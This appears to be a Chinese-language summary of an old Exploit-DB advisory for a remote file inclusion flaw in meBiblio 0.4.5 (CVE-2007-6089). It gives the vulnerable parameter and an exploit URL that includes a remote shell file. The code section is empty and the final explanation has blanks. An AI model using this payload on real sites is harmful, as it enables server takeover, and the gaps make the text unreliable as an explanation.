从这个网页截图中可以获取到以下关于漏洞的关键信息: 漏洞信息: - EDB-ID:4630 - CVE:2007-6089 - Author:SHAY6000N - Type:WEBAPPS - Platform:PHP - Date:2007-11-17 - Vulnerable App:meBiblio 0.4.5 漏洞描述: - Vulnerability Type:Remote File Inclusion - Vulnerable file:index.php - Exploit URL:http://localhost/path/index.php?action=http://localhost/shell.txt? - Method:get - Register_globals:On - Vulnerable variable:action - Line number:41 相关代码片段: 下载链接: - http://downloads.sourceforge.net/mebiblio/meBiblio-0.4.5.tar.gz?modtime=1195237984&big_mirror=0 其他信息: - Author:ShAy6o0oN - Group:PitBull Crew - Script:meBiblio 0.4.5 致谢: - Thanks To: str0ke 这个漏洞是由于在 文件中使用了 语句,且 设置为 ,导致可以通过 参数远程包含任意文件。